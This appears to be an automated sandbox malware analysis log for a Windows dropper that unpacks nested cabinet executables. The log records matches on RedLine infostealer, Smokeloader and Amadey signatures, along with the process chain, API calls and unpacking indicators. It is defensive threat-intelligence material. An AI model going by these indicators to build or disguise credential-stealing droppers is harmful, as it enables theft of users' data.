                    Source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E73BA20_2_00E73BA2
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E75C9E0_2_00E75C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E3BA21_2_003E3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E5C9E1_2_003E5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E3BA22_2_000E3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E5C9E2_2_000E5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A63BA23_2_00A63BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A65C9E3_2_00A65C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00408C606_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040DC116_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00407C3F6_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00418CCC6_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00406CA06_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004028B06_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041A4BE6_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004182446_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004016506_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402F206_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004193C46_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004187886_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402F896_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402B906_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004073A06_2_004073A0
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe 5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                    Source: y0EWt2mE9h.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E71F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_003E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_000E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A61F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00A61F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: y0EWt2mE9h.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 960128 bytes, 2 files, at 0x2c +A "shS06Up82.exe" +A "rTV61uz75.exe", ID 2177, number 1, 36 datablocks, 0x1503 compression
                    Source: shS06Up82.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 772896 bytes, 2 files, at 0x2c +A "sSH13Pp30.exe" +A "nNy98cB79.exe", ID 2096, number 1, 33 datablocks, 0x1503 compression
                    Source: sSH13Pp30.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 543088 bytes, 2 files, at 0x2c +A "smi53cv51.exe" +A "mzc23WZ.exe", ID 2096, number 1, 22 datablocks, 0x1503 compression
                    Source: smi53cv51.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252546 bytes, 2 files, at 0x2c +A "iGb20db.exe" +A "kLL28QE.exe", ID 1821, number 1, 12 datablocks, 0x1503 compression
                    Source: smi53cv51.exe.2.drStatic PE information: Resource name: RT_RCDATA type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.0
                    Source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs y0EWt2mE9h.exe
                    Source: y0EWt2mE9h.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs y0EWt2mE9h.exe
                    Source: y0EWt2mE9h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iGb20db.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E73FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00E73FEF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeCode function: 4_2_00007FF9A5DC1A1D ControlService,ChangeServiceConfigA,4_2_00007FF9A5DC1A1D
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E74FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00E74FE0
                    Source: y0EWt2mE9h.exeReversingLabs: Detection: 69%
                    Source: y0EWt2mE9h.exeVirustotal: Detection: 52%
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\y0EWt2mE9h.exe C:\Users\user\Desktop\y0EWt2mE9h.exe
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E71F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_003E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_000E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A61F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00A61F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00E7597D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCommand line argument: Kernel32.dll0_2_00E72BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCommand line argument: Kernel32.dll1_2_003E2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCommand line argument: Kernel32.dll2_2_000E2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCommand line argument: Kernel32.dll3_2_00A62BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCommand line argument: 08A6_2_00413780
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: y0EWt2mE9h.exeStatic file information: File size 1116672 > 1048576
                    Source: y0EWt2mE9h.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x108400
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: y0EWt2mE9h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, rTV61uz75.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: C:\sabaje resi\huwa\vacelij.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: ^C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdbPg source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, iGb20db.exe, 00000004.00000000.310286886.0000000000692000.00000002.00000001.01000000.00000007.sdmp, iGb20db.exe.3.dr
                    Source: Binary string: 0C:\sabaje resi\huwa\vacelij.pdbPg source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: _.pdb source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdb source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeUnpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeUnpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack .text:ER;.data:W;.tizivod:R;.rotuv:R;.vuj:R;.vuwoy:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7724D push ecx; ret 0_2_00E77260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E724D push ecx; ret 1_2_003E7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E724D push ecx; ret 2_2_000E7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A6724D push ecx; ret 3_2_00A67260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
